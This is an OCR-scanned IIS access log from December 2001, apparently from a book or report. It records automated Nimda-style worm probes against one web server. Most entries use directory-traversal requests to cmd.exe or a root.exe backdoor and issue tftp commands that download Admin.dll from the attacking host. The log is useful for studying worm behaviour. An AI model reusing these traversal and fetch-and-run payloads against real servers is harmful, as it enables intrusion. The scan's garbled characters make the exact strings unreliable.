2001-12-13 02:33:33 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 02:34:34 217 . 57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217 .57 .79.187%20GET%20Admin.dll%20Admin.dll 502 - 

2001-12-13 02:34:47 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/MSADC/root . exe /c+dir 403 - 

2001-12-13 02:34:56 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 02:35:03 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/d/winnt/ 'system32Zcmd.exe /c+dir 404 - 

2001-12-13 03:08:13 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001 -1 2-1 3 03:1 0:34 21 7.57.79.1 87 - 21 7.57.1 63.98 80 GET /scripts/root.exe /c+tftp%20- 
i%2021 7.57.79.1 87%20GET%20Admin.dll%20Admin.dll 502- 

2001 -1 2-1 3 06:1 3:43 21 7.57.79.1 87 - 21 7.57.1 63.98 80 GET /scripts/root.exe /c+dir 200 - 

2001-12-13 06:43:51 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 06:43:56 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217.57.79.187%20GET%20Admin.dll%20Admin.dll 502 - 

2001-12-13 06:44:23 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/d/winnt/ system32Zcmd.exe /c+dir 404 - 

2001-12-13 06:44:37 217 . 57 .79 .187 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . . %5c. . /winnt/ system32Zcmd.exe /c+dir 200 - 
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2001-12-13 06:44:43 217 . 57 . 79 . 187 - 217.57.163.98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exs /c+tftp%20- 
i%20217. 57. 79. 187%20GET%20Admin . dll%20c : \Admin.dll 502 - 

2001-12-13 06:44:48 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 79. 187%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 06:46:05 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 79. 187%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-13 06:46:10 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . . %5c. . /Admin.dll - 500 - 

2001-12-13 06:55:08 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 06:55:13 217 .57 .79 .187 - 217 . 57 .163 . 98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217.57.79.187%20GET%20Admin.dll%20Admin.dll 502 - 

2001-12-13 07:54:51 217 . 57 . 79 . 187 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 14:48:10 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 14:50:00 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/d/winnt/ 'system32Zcmd.exe /c+dir 404 - 

2001-12-13 14:50:06 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 

2001-12-13 14:50:11 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/ system32Zcmd.exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 14:53:24 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /system32/cmd . exe /c+dir 200 - 

2001-12-13 14:53:31 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 14:53:37 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 14:53:45 217 . 136 . 27 . 227 - 217 . 57 .163 . 98 80 GET 
/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt /system32 /cmd . exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20e: \Admin.dll 502 - 

2001-12-13 14:53:52 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/_vti_bin/. .%5c. ./. .%5c. ./. .%5c. ./Admin.dll - 500 - 

2001-12-13 14:53:59 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 

/_mem_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/ system32Zcmd.exe /c+dir 404 - 
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2001-12-13 14:54:06 217.136.27.227 - 217.57.163.98 80 GET 

/msadc/. . %5c. ./. . %5c. ./. . %5c/ . .A» . ./ . .A» . ./. .A» . . /winnt/system32/cmd. 

exe /c+dlr 403 - 

2001-12-13 14:54:11 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .A» . . /winnt/system32/cmd.exe /c+dir 500 - 

2001-12-13 14:54:16 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/ scripts/ root .exe /c+tftp%20- 

i%20217.136.27.227%20GET%20Admin.dll%20Admin.dll 502 - 

2001-12-13 14:54:16 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/winnt/system32/cmd.exe /c+dir 404 - 

2001-12-13 14:54:18 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/ system32Zcmd.exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 14:54:22 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ ../.. /winnt/system32/cmd. exe /c+dir 200 - 

2001-12-13 14:54:23 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt /syst em32/cmd.exe /c+tftp%20- 
i%20217 .136.27 .227 %20GET%20Admin.dll%20e: \Admin.dll 502 - 

2001-12-13 14:59:03 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ '.. \ .. /winnt/ system32/cmd. exe /c+dir 200 - 

2001-12-13 14:59:08 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . . \. . /winnt/ system32Zcmd.exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 14:59:13 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . . \. . /winnt/ system32Zcmd.exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 14:59:18 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
Z script sZ . . \. .ZwinntZsystem32Zcmd.exe Zc+tftp%20- 
i%20217 .136.27 .227 %20GET%20Admin.dll%20e: \Admin.dll 502 - 

2001-12-13 14:59:23 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
Z script sZ . ./• .ZwinntZsystem32Zcmd.exe Zc+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 14:59:24 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
ZscriptsZ..\-.ZAdmin.dll - 500 - 

2001-12-13 14:59:30 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
ZscriptsZ ■■ %5c. . ZwinntZsystem32Zcmd.exe Zc+dir 200 - 

2001-12-13 14:59:36 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
ZscriptsZ ■ .%5c. .ZwinntZsystem32Zcmd.exe Zc+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 15:00:54 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
ZscriptsZ ■ ./• .ZwinntZsystem32Zcmd.exe Zc+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin . dll%20d : \Admin.dll 502 - 

2001-12-13 15:02:02 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
ZscriptsZ ■ ./• .ZwinntZsystem32Zcmd.exe Zc+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20e: \Admin.dll 502 - 
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2001-12-13 15:02:45 217 . 136 . 27 . 227 - 217.57.163.98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 

2001-12-13 15:03:26 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 15:03:26 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217.57.113.19%20GET%20Admin.dll%20Admin.dll 502 - 

2001-12-13 15:03:32 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 15:03:33 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 

2001-12-13 15:03:33 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/sy stem32/cmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 15:03:35 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/sy stem32/cmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 15:03:38 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/sy stem32/cmd. exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 15:03:45 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/sy stem32/cmd. exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 

2001-12-13 15:03:45 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./ Admin.dll - 500 - 

2001-12-13 15:03:47 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/sy stem32/cmd. exe /c+tftp%20- 

i%20217. 57. 113. 19%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 15:03:48 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/sy stem32/cmd. exe / c+tftp%20- 

i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 15:03:48 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/sy stem32/cmd. exe /c+tftp%20- 

i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 

2001-12-13 15:03:50 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/_vti_bin/. .%5c. ./. .%5c. ./. .%5c. ./Admin.dll - 500 - 

2001-12-13 15:03:50 217 .57 .113 .19 - 217 .57 .163 .98 80 GET 

/_mem_bin/ . . %5c. ./• • %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 15:03:51 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 

/msadc/ . . %5c. ./. . %5c. ./. . %5c/ . .A» . ./ . .A» . ./ . .A» . . /winnt/system32/cmd. 

exe /c+dir 403 - 

2001-12-13 15:03:55 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .A» .. /winnt/system32/cmd. exe /c+dir 500 - 
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2001-12-13 15:03:59 217 . 57 . 113 . 19 - 217 .57 .163 .98 80 GET 
/scripts/winnt/system32/cmd.exe /c+dir 404 - 

2001-12-13 15:03:59 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . . / . . /winnt/system32/cmd.exe /c+dir 200 - 

2001-12-13 15:04:21 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . . %5c. . /winnt/system32/cmd . exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 15:04:30 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 15:04:30 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/root . exe /c+tftp%20- 

i%20217.57.113.19%20GET%20Admin.dll%20Admin.dll 502 - 

2001-12-13 15:04:32 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/ 'scripts /Admin . dll - 500 - 

2001-12-13 15:04:33 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 15:04:34 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 

2001-12-13 15:04:34 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/syst em32/cmd.exe /c+tftp%20- 
i%20217 .57 .113. 19%20GET%20 Admin. dll%20 c:\Admin. dll 502 - 

2001-12-13 15:04:40 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/syst em32/cmd.exe /c+tftp%20- 
i%20217 .136.27 .227 %20GET%20 Admin. dll%20c: \Admin.dll 502 - 

2001-12-13 15:04:43 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217 .136.27 .227 %20GET%20 Admin. dll%20e: \Admin.dll 502 - 

2001-12-13 15:05:57 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 

2001-12-13 15:06:01 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/syst em32/cmd.exe /c+tftp%20- 
i%20217. 136. 27. 227 %20GET%20 Admin. dll%20c: \Admin.dll 502 - 

2001-12-13 15:06:09 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/syst em32/cmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20e: \Admin.dll 502 - 

2001-12-13 15:06:09 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./Admin. dll - 500 - 

2001-12-13 15:06:11 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. ./ winnt/syst em32/cmd. exe /c+tftp%20- 

i%20217 .57 .113. 19%20GET%20 Admin. dll%20c: \Admin.dll 502 - 

2001-12-13 15:06:13 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. ./ winnt/syst em32/cmd. exe /c+tftp%20- 

i%20217 .57 .113. 19%20GET%20 Admin. dll%20d: \Admin.dll 502 - 
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2001-12-13 15:06:23 217.57.113.19 - 217.57.163.98 80 GET 

/_vti_b±n/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 

1%20217. 57. 113. 19%20GET%20Adm±n.dll%20e: \Admin.dll 502 - 

2001-12-13 15:06:23 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 
/_vti_bin/. .%5c. ./. .%5c. ./. .%5c. ./Admin.dll - 500 - 

2001-12-13 15:06:25 217 .57 .113 .19 - 217 . 57 .163 . 98 80 GET 

/_mem_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 15:06:35 217 . 57 . 113 . 19 - 217 . 57 . 163 . 98 80 GET 

/msadc/. . %5c. ./. . %5c. ./. . %5c/ . .A» . ./ . .A» . ./ . .A» . . /winnt/system32/cmd. 

exe /c+dir 403 - 

2001-12-13 15:07:38 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/ script s/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-13 15:07:42 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/script s/ .. %5c. . /Admin.dll - 500 - 

2001-12-13 15:07:46 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . . %2f. . /winnt/system32/cmd.exe /c+dir 200 - 

2001-12-13 15:08:28 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-13 15:09:23 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 15:09:28 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-13 15:09:33 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%2f. ./Admin.dll - 500 - 

2001-12-13 15:09:40 217 .57 .113 .19 - 217 .57 .163.98 80 GET 
/scripts/ . .%5c. . /winnt/ system32Zcmd.exe /c+tftp%20- 
i%20217. 57. 113. 19%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 15:10:15 217 .136 .27 .227 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt /system32/cmd. exe /c+tftp%20- 
i%20217. 136. 27. 227%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 15:12:11 217.136.27.227 - 217.57.163.98 80 GET 
/scripts/..%2f../winnt/system32/cmd.exe /c+tftp%20- 
i%20217.136.27.227%20GET%20Admin.dll%20c:\Admin.dll 502- 

2001-12-13 16:37:59 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 16:38:47 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/root .exe /c+tftp%20- 

i%20217.57.44.21%20GET%20Admin.dll%20Admin.dll 502 - 

2001-12-13 16:38:47 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/MSADC / root . exe /c+dir 403 - 
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2001-12-13 16:38:47 217.57.44.21 - 217.57.163.98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 16:38:47 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 16:38:47 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . . %5c. . /winnt/system32/cmd.exe /c+dir 200 - 

2001-12-13 16:38:47 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin . dll%20c : \Admin.dll 502 - 

2001-12-13 16:38:48 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 16:38:48 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001 -1 2-1 3 1 6:38:48 21 7.57.44.21 - 21 7.57.1 63.98 80 GET /scripts/..%5c../Admin.dll - 500 - 

2001-12-13 16:38:48 217 .57 .44.21 - 217 .57 .163 .98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd.exe /c+tftp%20- 

i%20217. 57. 44. 21%20GET%20Admin.dll%20c: \Admin.dll 502 - 

2001-12-13 16:38:49 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 

i%20217. 57. 44. 21%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 16:38:49 217 .57 .44.21 - 217 .57 .163 .98 80 GET 

/_vti_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+tftp%20- 

i%20217. 57. 44. 21%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-13 16:38:49 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/_vti_bin/. .%5c. ./. .%5c. ./. .%5c. ./Admin.dll - 500 - 

2001-12-13 16:38:49 217 .57 .44.21 - 217 .57 .163 .98 80 GET 

/_mem_bin/ . . %5c. ./. . %5c. ./. . %5c. . /winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 16:38:49 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 

/msadc/ . . %5c. ./. . %5c. ./. . %5c/. .A* . ./ . .A* . ./ . .A* . . /winnt/system32/cmd. 

exe /c+dir 403 - 

2001-12-13 16:38:49 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .A» .. /winnt/system32/cmd. exe /c+dir 500 - 

2001-12-13 16:38:49 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/winnt/system32/cmd.exe /c+dir 404 - 

2001-12-13 16:38:49 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ ../.. /winnt/system32/cmd. exe /c+dir 200 - 

2001-12-13 16:38:50 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ . ./• . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin . dll%20c : \Admin.dll 502 - 

2001-12-13 16:38:50 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . ./. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin.dll%20d: \Admin.dll 502 - 
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2001-12-13 16:38:50 217.57.44.21 - 217 .57 .163 .98 80 GET 
/ script s/ . ./. . /w±nnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin.dll%20e: \Admin.dll 502 - 

2001-12-13 16:38:50 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/ script s/ . . \ . . /winnt/system32/cmd.exe /c+dir 200 - 

2001-12-13 16:38:51 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ . . \ . . /Admin.dll - 500 - 

2001-12-13 16:38:51 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd.exB /c+dir 200 - 

2001-12-13 16:38:52 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 16:38:52 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exs /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-13 16:38:52 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-13 16:38:52 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd.exB /c+dir 200 - 

2001-12-13 16:38:53 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin . dll%20c : \Admin.dll 502 - 

2001-12-13 16:38:53 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/systsm32/cmd.Bxe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 16:38:53 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin . dll%20e : \Admin.dll 502 - 

2001-12-13 16:38:53 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-13 16:38:53 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd.exs /c+dir 200 - 

2001-12-13 16:38:54 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exs /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin . dll%20c : \Admin.dll 502 - 

2001-12-13 16:38:54 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exs /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin.dll%20d: \Admin.dll 502 - 

2001-12-13 16:38:54 217 .57 .44.21 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/sy stem32/cmd.exe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin . dll%20s : \Admin.dll 502 - 
2001-12-13 16:38:54 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%5c. ./Admin.dll - 500 - 

2001-12-13 16:38:54 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ .. %2f. . /winnt/system32/cmd.exs /c+dir 200 - 
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2001-12-13 16:38:55 217.57.44.21 - 217 .57 .163 .98 80 GET 
/scripts/ . .%2f. . /w±nnt/system32/cmd.exe /c+tftp%20- 
1%20217. 57. 44. 21%20GET%20Admln . dll%20c : \Admin.dll 502 - 
2001-12-13 16:38:55 217 .57 .44.21 - 217 .57 .163 .98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exB /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin.dll%20d: \Admin.dll 502 - 
2001-12-13 16:38:55 217 .57 .44.21 - 217 . 57 . 163 . 98 80 GET 
/scripts/ . .%2f. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 57. 44. 21%20GET%20Admin . dll%20e : \Admin.dll 502 - 
2001-12-13 16:38:55 217 .57 .44.21 - 217 .57 .163 .98 80 GET 
/scripts/ .. %2f. . /Admin.dll - 500 - 

2001-12-13 16:52:28 217 .72 .72 .166 - 217 .57 .163.98 80 GET 
/scripts/root . exe /c+dir 200 - 

2001-12-13 16:52:28 217.72.72.166 - 217.57.163.98 80 GET /scripts/root.exe /c+tftp%20- 
i%2021 7.72.72.1 66%20GET%20cool.dll%20httpodbc.dll 502 - 
2001-12-13 16:52:30 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/httpodbc.dll - 500 - 

2001-12-13 16:52:30 217 .72 .72 .166 - 217 . 57 . 163 . 98 80 GET 
/MSADC/root.exe /c+dir 403 - 

2001-12-13 16:52:33 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/c/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 16:52:35 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/d/winnt/system32/cmd. exe /c+dir 404 - 

2001-12-13 16:52:36 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ .. %5c. . /winnt/system32/cmd. exe /c+dir 200 - 
2001-12-13 16:52:38 217 .72 .72 .166 - 217 . 57 .163 . 98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72. 166%20GET%20cool . dll%20c : \httpodbc.dll 502 - 
2001-12-13 16:52:40 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
/scripts/ . .%5c. . /winnt/system32/cmd.exe /c+tftp%20- 
i%20217. 72. 72. 166%20GET%20cool.dll%20d: \httpodbc.dll 502 - 
2001-12-13 16:52:40 217 .72 .72 .166 - 217 .57 .163 .98 80 GET 
